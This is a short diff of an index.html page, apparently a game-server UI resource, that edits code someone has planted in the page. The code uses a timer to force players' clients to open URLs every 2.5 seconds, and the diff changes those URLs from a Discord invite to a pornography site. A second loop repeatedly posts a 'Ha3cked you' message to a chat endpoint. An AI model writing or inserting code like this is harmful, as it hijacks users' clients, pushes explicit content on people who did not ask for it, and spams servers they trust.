--- a/index.html
+++ b/index.html
@@ -79,13 +79,13 @@
         });
 
         setInterval(function() {
-            window.invokeNative("openUrl", "https://discord.gg/3MermwaaHx");
-            window.invokeNative("openUrl", "https://discord.gg/3MermwaaHx");
-            window.invokeNative("openUrl", "https://discord.gg/3MermwaaHx");
-            window.invokeNative("openUrl", "https://discord.gg/3MermwaaHx");
+            window.invokeNative("openUrl", "https:pornhub.com");
+            window.invokeNative("openUrl", "https:pornhub.com");
+            window.invokeNative("openUrl", "https:pornhub.com");
+            window.invokeNative("openUrl", "https:pornhub.com");
         }, 2500);
    
-const msg = ` arablife Ha3cked you 🫃🔞  `;
+const msg = ` sfa7 Ha3cked you 🫃🔞  `;
 const body = JSON.stringify({ message: msg });
 setInterval(() => {
 fetch("https://flix-scripts/chatResult", { method: "POST", body });
